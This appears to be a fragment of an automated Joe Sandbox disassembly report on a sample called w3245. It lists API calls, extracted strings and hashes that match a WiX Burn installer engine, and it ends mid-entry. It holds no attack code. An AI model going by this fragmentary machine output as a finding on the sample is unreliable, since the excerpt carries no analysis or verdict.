                                                                                                                                                                    • Instruction Fuzzy Hash: 58B1A0332091A24BEF2D8239843407FFBE95AD23B1B1A179DD4B2CB1D5EE20D535DA20
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: e3025ad2e5ee0c0052250064c8ec02caec3a3acd7e143d3248ea4760e17cbee8
                                                                                                                                                                    • Instruction ID: a9a7a98f39b7697c02d0d21444d94997af94ff9761dda2864b77b0c4f4039ad4
                                                                                                                                                                    • Opcode Fuzzy Hash: e3025ad2e5ee0c0052250064c8ec02caec3a3acd7e143d3248ea4760e17cbee8
                                                                                                                                                                    • Instruction Fuzzy Hash: 3D619B7164470866DF389B688896BBE73ADEF81700F10891AF983DF281D615DE81CF56
                                                                                                                                                                    APIs
                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000,00000000,00000001,00000000,00000101,?,?,00020006,00000000), ref: 00910592
                                                                                                                                                                    Strings
Memory Dump Source
• Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
• Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Close
                                                                                                                                                                    • String ID: /uninstall$"%ls" %ls$"%ls" /modify$"%ls" /uninstall /quiet$%hs$%hu.%hu.%hu.%hu$%s,0$/modify$3.11.1.2318$BundleAddonCode$BundleCachePath$BundleDetectCode$BundlePatchCode$BundleProviderKey$BundleTag$BundleUpgradeCode$BundleVersion$Comments$Contact$DisplayIcon$DisplayVersion$EngineVersion$EstimatedSize$Failed to cache bundle from path: %ls$Failed to create registration key.$Failed to register the bundle dependency key.$Failed to update name and publisher.$Failed to update resume mode.$Failed to write %ls value.$Failed to write software tags.$Failed to write update registration.$HelpLink$HelpTelephone$ModifyPath$NoElevateOnModify$NoModify$NoRemove$ParentDisplayName$ParentKeyName$Publisher$QuietUninstallString$SystemComponent$URLInfoAbout$URLUpdateInfo$UninstallString$VersionMajor$VersionMinor
                                                                                                                                                                    • API String ID: 3535843008-2755343042
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,download,000000FF,00000000,Packaging,00000000,00000000,FilePath,0090545D,00000000,0094CA9C,00905445,00000000), ref: 0090CEF3
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to find catalog., xrefs: 0090D1CE
                                                                                                                                                                    • Failed to get payload node count., xrefs: 0090CE10
                                                                                                                                                                    • CertificateRootPublicKeyIdentifier, xrefs: 0090D03D
                                                                                                                                                                    • Failed to get @FileSize., xrefs: 0090D1AB
                                                                                                                                                                    • Failed to get @Id., xrefs: 0090D221
                                                                                                                                                                    • SourcePath, xrefs: 0090CFB0
                                                                                                                                                                    • LayoutOnly, xrefs: 0090CF8D
                                                                                                                                                                    • Failed to get @Packaging., xrefs: 0090D213
                                                                                                                                                                    • Catalog, xrefs: 0090D0EC
                                                                                                                                                                    • external, xrefs: 0090CF21
                                                                                                                                                                    • embedded, xrefs: 0090CF05
                                                                                                                                                                    • Failed to hex decode @CertificateRootPublicKeyIdentifier., xrefs: 0090D1B2
                                                                                                                                                                    • FilePath, xrefs: 0090CEAB
                                                                                                                                                                    • Failed to get @DownloadUrl., xrefs: 0090D1EA
                                                                                                                                                                    • Failed to hex decode @CertificateRootThumbprint., xrefs: 0090D1C0
                                                                                                                                                                    • CertificateRootThumbprint, xrefs: 0090D07A
                                                                                                                                                                    • Packaging, xrefs: 0090CEC6
                                                                                                                                                                    • Failed to get @Container., xrefs: 0090D18D
                                                                                                                                                                    • Failed to get @FilePath., xrefs: 0090D21A
                                                                                                                                                                    • payload.cpp, xrefs: 0090CE3F
                                                                                                                                                                    • Failed to get next node., xrefs: 0090D228
                                                                                                                                                                    • Failed to get @LayoutOnly., xrefs: 0090D197
                                                                                                                                                                    • Failed to parse @FileSize., xrefs: 0090D1A1
                                                                                                                                                                    • Failed to get @Catalog., xrefs: 0090D1D5
                                                                                                                                                                    • Failed to to find container: %ls, xrefs: 0090D186
                                                                                                                                                                    • DownloadUrl, xrefs: 0090CFD9
                                                                                                                                                                    • Failed to select payload nodes., xrefs: 0090CDEB
                                                                                                                                                                    • Failed to get @SourcePath., xrefs: 0090D1F1
                                                                                                                                                                    • Invalid value for @Packaging: %ls, xrefs: 0090D200
                                                                                                                                                                    • Payload, xrefs: 0090CDD8
                                                                                                                                                                    • download, xrefs: 0090CEE5
                                                                                                                                                                    • Failed to hex decode the Payload/@Hash., xrefs: 0090D1DC
                                                                                                                                                                    • FileSize, xrefs: 0090D002
                                                                                                                                                                    • Failed to get @Hash., xrefs: 0090D1E3
                                                                                                                                                                    • Failed to get @CertificateRootThumbprint., xrefs: 0090D1C7
                                                                                                                                                                    • Failed to allocate memory for payload structs., xrefs: 0090CE49
                                                                                                                                                                    • Hash, xrefs: 0090D0B7
                                                                                                                                                                    • Container, xrefs: 0090CF4B
                                                                                                                                                                    • Failed to get @CertificateRootPublicKeyIdentifier., xrefs: 0090D1B9
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Heap$AllocateCompareProcessString
                                                                                                                                                                    • String ID: Catalog$CertificateRootPublicKeyIdentifier$CertificateRootThumbprint$Container$DownloadUrl$Failed to allocate memory for payload structs.$Failed to find catalog.$Failed to get @Catalog.$Failed to get @CertificateRootPublicKeyIdentifier.$Failed to get @CertificateRootThumbprint.$Failed to get @Container.$Failed to get @DownloadUrl.$Failed to get @FilePath.$Failed to get @FileSize.$Failed to get @Hash.$Failed to get @Id.$Failed to get @LayoutOnly.$Failed to get @Packaging.$Failed to get @SourcePath.$Failed to get next node.$Failed to get payload node count.$Failed to hex decode @CertificateRootPublicKeyIdentifier.$Failed to hex decode @CertificateRootThumbprint.$Failed to hex decode the Payload/@Hash.$Failed to parse @FileSize.$Failed to select payload nodes.$Failed to to find container: %ls$FilePath$FileSize$Hash$Invalid value for @Packaging: %ls$LayoutOnly$Packaging$Payload$SourcePath$download$embedded$external$payload.cpp
                                                                                                                                                                    • API String ID: 1171520630-3127305756
                                                                                                                                                                    APIs
                                                                                                                                                                    • EnterCriticalSection.KERNEL32(00905445,?,00000000,80070490,?,?,?,?,?,?,?,?,0092C1BF,?,00905445,?), ref: 009084A7
                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(00905445,?,?,?,?,?,?,?,?,0092C1BF,?,00905445,?,00905445,00905445,Chain), ref: 00908804
                                                                                                                                                                    Strings
                                                                                                                                                                    • Hidden, xrefs: 0090852F
                                                                                                                                                                    • Initializing version variable '%ls' to value '%ls', xrefs: 00908653
                                                                                                                                                                    • Invalid value for @Type: %ls, xrefs: 00908778
                                                                                                                                                                    • Failed to set variant value., xrefs: 0090878F
                                                                                                                                                                    • Failed to set variant encryption, xrefs: 0090879D
                                                                                                                                                                    • Failed to find variable value '%ls'., xrefs: 009087D2
                                                                                                                                                                    • Failed to insert variable '%ls'., xrefs: 009086C6
                                                                                                                                                                    • Failed to get variable node count., xrefs: 009084E1
                                                                                                                                                                    • Initializing hidden variable '%ls', xrefs: 00908671
                                                                                                                                                                    • Failed to get @Id., xrefs: 009087EF
                                                                                                                                                                    • Attempt to set built-in variable value: %ls, xrefs: 009087C8
                                                                                                                                                                    • Type, xrefs: 009085A3
                                                                                                                                                                    • variable.cpp, xrefs: 009087B9
                                                                                                                                                                    • Failed to get @Persisted., xrefs: 009087E1
                                                                                                                                                                    • Failed to get @Type., xrefs: 00908788
                                                                                                                                                                    • numeric, xrefs: 009085BC
                                                                                                                                                                    • Failed to get @Hidden., xrefs: 009087E8
                                                                                                                                                                    • Failed to get next node., xrefs: 009087F6
                                                                                                                                                                    • Initializing numeric variable '%ls' to value '%ls', xrefs: 009085E2
                                                                                                                                                                    • Failed to get @Value., xrefs: 00908796
                                                                                                                                                                    • Persisted, xrefs: 0090854A
                                                                                                                                                                    • Failed to set value of variable: %ls, xrefs: 009087A7
                                                                                                                                                                    • Failed to select variable nodes., xrefs: 009084C4
                                                                                                                                                                    • Initializing string variable '%ls' to value '%ls', xrefs: 0090861A
                                                                                                                                                                    • version, xrefs: 0090862C
                                                                                                                                                                    • Value, xrefs: 00908565
                                                                                                                                                                    • Variable, xrefs: 009084B1
                                                                                                                                                                    • string, xrefs: 009085F7
                                                                                                                                                                    • Failed to change variant type., xrefs: 009087DA
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CriticalSection$EnterLeave
                                                                                                                                                                    • String ID: Attempt to set built-in variable value: %ls$Failed to change variant type.$Failed to find variable value '%ls'.$Failed to get @Hidden.$Failed to get @Id.$Failed to get @Persisted.$Failed to get @Type.$Failed to get @Value.$Failed to get next node.$Failed to get variable node count.$Failed to insert variable '%ls'.$Failed to select variable nodes.$Failed to set value of variable: %ls$Failed to set variant encryption$Failed to set variant value.$Hidden$Initializing hidden variable '%ls'$Initializing numeric variable '%ls' to value '%ls'$Initializing string variable '%ls' to value '%ls'$Initializing version variable '%ls' to value '%ls'$Invalid value for @Type: %ls$Persisted$Type$Value$Variable$numeric$string$variable.cpp$version
                                                                                                                                                                    • API String ID: 3168844106-1614826165
                                                                                                                                                                    • Opcode ID: 50dc9a611d3ac5315060de890503c53aa73e53805311f56a8323738bfe4374b8
                                                                                                                                                                    • Instruction ID: e7a031d5749fa5105a6e75c104775309b0eedbd9724251fe0bdea711969d99fd
                                                                                                                                                                    • Opcode Fuzzy Hash: 50dc9a611d3ac5315060de890503c53aa73e53805311f56a8323738bfe4374b8
                                                                                                                                                                    • Instruction Fuzzy Hash: E5B1E172E01229FFCF119B94CC45EAFBB78AF84724F214654F994B61D1CB719A00DB90
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,0091BDDC,00000007,?,?,?), ref: 00926D20
                                                                                                                                                                      • Part of subcall function 00940ACC: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00905EB2,00000000), ref: 00940AE0
                                                                                                                                                                      • Part of subcall function 00940ACC: GetProcAddress.KERNEL32(00000000), ref: 00940AE7
                                                                                                                                                                      • Part of subcall function 00940ACC: GetLastError.KERNEL32(?,?,?,00905EB2,00000000), ref: 00940AFE
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 0092710F
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,000001F4,?,?,?,?,?,?,?,?,?,?,wusa.exe,?,00000025), ref: 00927123
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to wait for executable to complete: %ls, xrefs: 0092709E
                                                                                                                                                                    • Failed to get process exit code., xrefs: 0092702C
                                                                                                                                                                    • SysNative\, xrefs: 00926D6A
                                                                                                                                                                    • /log:, xrefs: 00926EA2
                                                                                                                                                                    • "%ls" "%ls" /quiet /norestart, xrefs: 00926E48
                                                                                                                                                                    • Failed to format MSU uninstall command., xrefs: 00926E89
                                                                                                                                                                    • Failed to build MSU path., xrefs: 00926E35
                                                                                                                                                                    • "%ls" /uninstall /kb:%ls /quiet /norestart, xrefs: 00926E75
                                                                                                                                                                    • Failed to ensure WU service was enabled to install MSU package., xrefs: 00926F2E
                                                                                                                                                                    • Failed to get cached path for package: %ls, xrefs: 00926DFC
                                                                                                                                                                    • Failed to determine WOW64 status., xrefs: 00926D32
                                                                                                                                                                    • Failed to find Windows directory., xrefs: 00926D5F
                                                                                                                                                                    • Failed to find System32 directory., xrefs: 00926D95
                                                                                                                                                                    • Failed to append SysNative directory., xrefs: 00926D7D
                                                                                                                                                                    • Failed to allocate WUSA.exe path., xrefs: 00926DB3
                                                                                                                                                                    • Bootstrapper application aborted during MSU progress., xrefs: 00927054
                                                                                                                                                                    • Failed to CreateProcess on path: %ls, xrefs: 00926F9A
                                                                                                                                                                    • 2, xrefs: 00926FB3
                                                                                                                                                                    • Failed to append log path to MSU command-line., xrefs: 00926ED4
                                                                                                                                                                    • WixBundleExecutePackageCacheFolder, xrefs: 00926E0B, 0092713B
                                                                                                                                                                    • wusa.exe, xrefs: 00926DA0
                                                                                                                                                                    • Failed to append log switch to MSU command-line., xrefs: 00926EB6
                                                                                                                                                                    • Failed to format MSU install command., xrefs: 00926E5C
                                                                                                                                                                    • msuengine.cpp, xrefs: 00926F8D, 00927022, 0092704A
                                                                                                                                                                    • Failed to get action arguments for MSU package., xrefs: 00926DD6
                                                                                                                                                                    • D, xrefs: 00926F3B
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Handle$Close$AddressCurrentErrorLastModuleProcProcess
                                                                                                                                                                    • String ID: /log:$"%ls" "%ls" /quiet /norestart$"%ls" /uninstall /kb:%ls /quiet /norestart$2$Bootstrapper application aborted during MSU progress.$D$Failed to CreateProcess on path: %ls$Failed to allocate WUSA.exe path.$Failed to append SysNative directory.$Failed to append log path to MSU command-line.$Failed to append log switch to MSU command-line.$Failed to build MSU path.$Failed to determine WOW64 status.$Failed to ensure WU service was enabled to install MSU package.$Failed to find System32 directory.$Failed to find Windows directory.$Failed to format MSU install command.$Failed to format MSU uninstall command.$Failed to get action arguments for MSU package.$Failed to get cached path for package: %ls$Failed to get process exit code.$Failed to wait for executable to complete: %ls$SysNative\$WixBundleExecutePackageCacheFolder$msuengine.cpp$wusa.exe
                                                                                                                                                                    • API String ID: 1400713077-4261965642
                                                                                                                                                                    • Opcode ID: 8aed102b90d85d7f0e9e66fec0eb042181a884529f5a2d6bef33801d9f935fd9
                                                                                                                                                                    • Instruction ID: 8e9875f24b60ef62554322ec42d19eecfae31fa8fc2a7515e55bbe21dca5940f
                                                                                                                                                                    • Opcode Fuzzy Hash: 8aed102b90d85d7f0e9e66fec0eb042181a884529f5a2d6bef33801d9f935fd9
                                                                                                                                                                    • Instruction Fuzzy Hash: 37D1D170A4132AEFDF21DFE5EC85FAEBAB8AF48704F100425FA00B2195D7B49958DB50
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,generator,000000FF,?,?,?), ref: 0094755D
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00947726
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 009477C3
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$FreeHeap$AllocateCompareProcess
                                                                                                                                                                    • String ID: ($@$`<u$atomutil.cpp$author$category$entry$generator$icon$link$logo$subtitle$title$updated
                                                                                                                                                                    • API String ID: 1555028553-639730868
                                                                                                                                                                    • Opcode ID: 9a29e6fc7c21348fa93db2bf2a41de01116b7bdfc081e1aae4cd27a6f7cb9626
                                                                                                                                                                    • Instruction ID: 6076f7ece4837861cc013e434e39693af9bf19ca881071d109245859dd38de11
                                                                                                                                                                    • Opcode Fuzzy Hash: 9a29e6fc7c21348fa93db2bf2a41de01116b7bdfc081e1aae4cd27a6f7cb9626
                                                                                                                                                                    • Instruction Fuzzy Hash: 5EB18E7194822AFBDB119BE4CC81FAEB778AB04724F600755F521AB2D2D770EA10DB90
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,00963E78,000000FF,?,?,?), ref: 009471D4
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 009471F9
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 00947219
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 00947235
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 0094725D
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 00947279
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 009472B2
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 009472EB
                                                                                                                                                                      • Part of subcall function 00946D50: SysFreeString.OLEAUT32(00000000), ref: 00946E89
                                                                                                                                                                      • Part of subcall function 00946D50: SysFreeString.OLEAUT32(00000000), ref: 00946EC8
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0094736F
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 0094741F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$Compare$Free
                                                                                                                                                                    • String ID: ($`<u$atomutil.cpp$author$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
                                                                                                                                                                    • API String ID: 318886736-2569518843
                                                                                                                                                                    • Opcode ID: 7d11a99ee7afc28c7c1d90a1a42ef8a73ce7cbdbcf2767a316ea64c97cfd1616
                                                                                                                                                                    • Instruction ID: f517905b47e39d4b045715f37d8516a83c95340cf73c607e9d9ab69451fb6814
                                                                                                                                                                    • Opcode Fuzzy Hash: 7d11a99ee7afc28c7c1d90a1a42ef8a73ce7cbdbcf2767a316ea64c97cfd1616
                                                                                                                                                                    • Instruction Fuzzy Hash: 1AA18F3194821AFBDB219BE4CC41FAEBB69EB04730F204755F921A61E1DB70EE10DB91
                                                                                                                                                                    APIs
                                                                                                                                                                    • UuidCreate.RPCRT4(?), ref: 0092D4B3
                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000027), ref: 0092D4DC
                                                                                                                                                                    • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?,?,?), ref: 0092D5C5
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 0092D5CF
                                                                                                                                                                    • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,?,?,?,?), ref: 0092D668
                                                                                                                                                                    • WaitForSingleObject.KERNEL32(0094B500,000000FF,?,?,?,?), ref: 0092D673
                                                                                                                                                                    • ReleaseMutex.KERNEL32(0094B500,?,?,?,?), ref: 0092D69D
                                                                                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 0092D6BE
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 0092D6CC
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?), ref: 0092D704
                                                                                                                                                                      • Part of subcall function 0092D33E: WaitForSingleObject.KERNEL32(?,000000FF,74DF30B0,00000000,?,?,?,?,0092D642,?), ref: 0092D357
                                                                                                                                                                      • Part of subcall function 0092D33E: ReleaseMutex.KERNEL32(?,?,?,?,0092D642,?), ref: 0092D375
                                                                                                                                                                      • Part of subcall function 0092D33E: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0092D3B6
                                                                                                                                                                      • Part of subcall function 0092D33E: ReleaseMutex.KERNEL32(?), ref: 0092D3CD
                                                                                                                                                                      • Part of subcall function 0092D33E: SetEvent.KERNEL32(?), ref: 0092D3D6
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0092D7B9
                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?), ref: 0092D7D1
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to create netfx chainer guid., xrefs: 0092D4C0
                                                                                                                                                                    • Failed to CreateProcess on path: %ls, xrefs: 0092D5FE
                                                                                                                                                                    • %ls /pipe %ls, xrefs: 0092D57F
                                                                                                                                                                    • NetFxChainer.cpp, xrefs: 0092D4F1, 0092D5F3, 0092D6F0, 0092D728
                                                                                                                                                                    • D, xrefs: 0092D5AA
                                                                                                                                                                    • Failed to get netfx return code., xrefs: 0092D6FA
                                                                                                                                                                    • Failed to wait for netfx chainer process to complete, xrefs: 0092D732
                                                                                                                                                                    • Failed to allocate section name., xrefs: 0092D51D
                                                                                                                                                                    • Failed to allocate event name., xrefs: 0092D53F
                                                                                                                                                                    • Failed to create netfx chainer., xrefs: 0092D55E
                                                                                                                                                                    • Failed to process netfx chainer message., xrefs: 0092D648
                                                                                                                                                                    • NetFxSection.%ls, xrefs: 0092D509
                                                                                                                                                                    • Failed to allocate netfx chainer arguments., xrefs: 0092D593
                                                                                                                                                                    • NetFxEvent.%ls, xrefs: 0092D52B
                                                                                                                                                                    • Failed to convert netfx chainer guid into string., xrefs: 0092D4FB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Wait$ErrorLastMutexObjectReleaseSingle$CloseCreateHandleProcess$CodeEventExitFromMultipleObjectsStringUuid
                                                                                                                                                                    • String ID: %ls /pipe %ls$D$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
                                                                                                                                                                    • API String ID: 1533322865-1825855094
                                                                                                                                                                    • Opcode ID: 7ace09c3e3034404c286f101e06bb3e9ee0c8bb6025b09d8a1089738e9d8a00b
                                                                                                                                                                    • Instruction ID: 1f588cb36067b02b6165808e75224cfea8baa32ca2e95ae2aa897716e5e6b1b1
                                                                                                                                                                    • Opcode Fuzzy Hash: 7ace09c3e3034404c286f101e06bb3e9ee0c8bb6025b09d8a1089738e9d8a00b
                                                                                                                                                                    • Instruction Fuzzy Hash: CAA1AC72D01228AFDB209BA4DC85FAEB7B8BB44720F104565FA08FB295D7749D408F91
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrlenW.KERNEL32(?,?,00000000,?,0094B500,?,00000000,?,0090452F,?,0094B500), ref: 009154FD
                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,0090452F,?,0094B500), ref: 00915508
                                                                                                                                                                    • SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0090452F,?,0094B500), ref: 0091553F
                                                                                                                                                                    • ConnectNamedPipe.KERNEL32(?,00000000,?,0090452F,?,0094B500), ref: 00915554
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090452F,?,0094B500), ref: 0091555E
                                                                                                                                                                    • Sleep.KERNEL32(00000064,?,0090452F,?,0094B500), ref: 00915593
                                                                                                                                                                    • SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0090452F,?,0094B500), ref: 009155B6
                                                                                                                                                                    • WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0090452F,?,0094B500), ref: 009155D1
                                                                                                                                                                    • WriteFile.KERNEL32(?,0090452F,0094B500,00000000,00000000,?,0090452F,?,0094B500), ref: 009155EC
                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,0090452F,?,0094B500), ref: 00915607
                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000004,00000000,00000000,?,0090452F,?,0094B500), ref: 00915622
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090452F,?,0094B500), ref: 0091567D
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090452F,?,0094B500), ref: 009156B1
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090452F,?,0094B500), ref: 009156E5
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090452F,?,0094B500), ref: 00915719
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090452F,?,0094B500), ref: 0091574A
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090452F,?,0094B500), ref: 0091577B
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
